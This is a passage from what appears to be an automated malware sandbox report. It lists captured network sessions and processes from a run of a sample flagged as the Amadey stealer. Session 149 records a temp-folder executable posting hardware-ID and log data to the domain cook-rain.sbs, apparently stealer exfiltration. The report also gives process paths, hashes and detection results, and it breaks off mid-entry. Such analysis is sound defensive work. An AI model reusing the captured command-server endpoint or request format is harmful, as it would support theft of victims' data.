                                                                                                                                                                                                                                                                                                            Server: ECAcc (lpl/EF70)
                                                                                                                                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                            X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=192873
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:58 GMT
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            X-CID: 2


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            145192.168.2.44991813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:58 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:58 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: e2992adc-501e-005b-288c-3ad7f7000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111058Z-1777c6cb754j47wfhC1TEB5wrw00000006wg000000004kkn
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            146192.168.2.44991913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:58 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:59 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1406
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: e332bc5f-001e-000b-6e5c-3b15a7000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111059Z-178bfbc474b9fdhphC1NYCac0n00000001dg0000000006ke
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            147192.168.2.44992113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:59 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1369
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE32FE1A2"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: e9975653-d01e-0065-2d8c-3ab77a000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111059Z-178bfbc474bbcwv4hC1NYCypys0000000180000000007brx
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            148192.168.2.44992213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:59 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1414
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 39864200-f01e-0071-0968-3b431c000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111059Z-178bfbc474bp8mkvhC1NYCzqnn000000017g000000006wbd
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            149192.168.2.449924188.114.96.34432896C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=R7BGVMBYUX03
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Content-Length: 20407
                                                                                                                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC15331OUTData Raw: 2d 2d 52 37 42 47 56 4d 42 59 55 58 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 31 42 39 43 46 37 31 41 31 38 31 43 31 37 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 52 37 42 47 56 4d 42 59 55 58 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 37 42 47 56 4d 42 59 55 58 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 52 37 42 47 56 4d 42 59
                                                                                                                                                                                                                                                                                                            Data Ascii: --R7BGVMBYUX03Content-Disposition: form-data; name="hwid"391B9CF71A181C1763CFCF7E6C45F838--R7BGVMBYUX03Content-Disposition: form-data; name="pid"3--R7BGVMBYUX03Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--R7BGVMBY
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:59 UTC5076OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                                                                            2024-11-21 11:11:00 UTC986INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:11:00 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=0i574gu0mm6c5qh3dhfc4oaio3; expires=Mon, 17-Mar-2025 04:57:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGclVL%2BxfvvnjwlvpyF0aZlF%2F3%2FPT3WvIDQot2Gwu34cn23EuTVCEg388fH35meNo%2FQ1xEzMI4UHgM7DHt61D1KM7SgB2KY6I4sEacvLNTV0Nu8GR34h7hL3RhsS8glt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                            CF-RAY: 8e603c880ecd6a57-EWR
                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2264&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21360&delivery_rate=1272331&cwnd=231&unsent_bytes=0&cid=80ea7ef893087b3c&ts=886&x=0"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:11:00 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                                                                                                            2024-11-21 11:11:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                                                                            Start time:06:08:58
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0xe30000
                                                                                                                                                                                                                                                                                                            File size:1'889'792 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:FC60FAC3B512854DF25F9A62A8982B5F
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1773808493.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1719295113.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                                                                                            Start time:06:09:02
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0x8e0000
                                                                                                                                                                                                                                                                                                            File size:1'889'792 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:FC60FAC3B512854DF25F9A62A8982B5F
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1807882678.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1766404144.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                            • Detection: 50%, ReversingLabs
                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                                                                            Start time:06:09:03
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            Imagebase:0x8e0000
                                                                                                                                                                                                                                                                                                            File size:1'889'792 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:FC60FAC3B512854DF25F9A62A8982B5F
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1821417963.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1780762831.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                                                                                            Start time:06:10:00
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            Imagebase:0x8e0000
                                                                                                                                                                                                                                                                                                            File size:1'889'792 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:FC60FAC3B512854DF25F9A62A8982B5F
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2332006204.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                                                                                            Start time:06:10:19
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0x2f0000
                                                                                                                                                                                                                                                                                                            File size:4'406'272 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:A02A1CB540D8658F640DBA74A1ADA983
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                                                                                            Start time:06:10:28
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0xf40000
                                                                                                                                                                                                                                                                                                            File size:1'925'632 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:77483DF5AA89C592975F97C5B06E3B90
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                            • Detection: 42%, ReversingLabs
                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                                                                            Start time:06:10:36
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                                                                                                                                                                            File size:1'800'704 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:EFBCCEEFF7FBBE424508E4DE00AD3CCD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
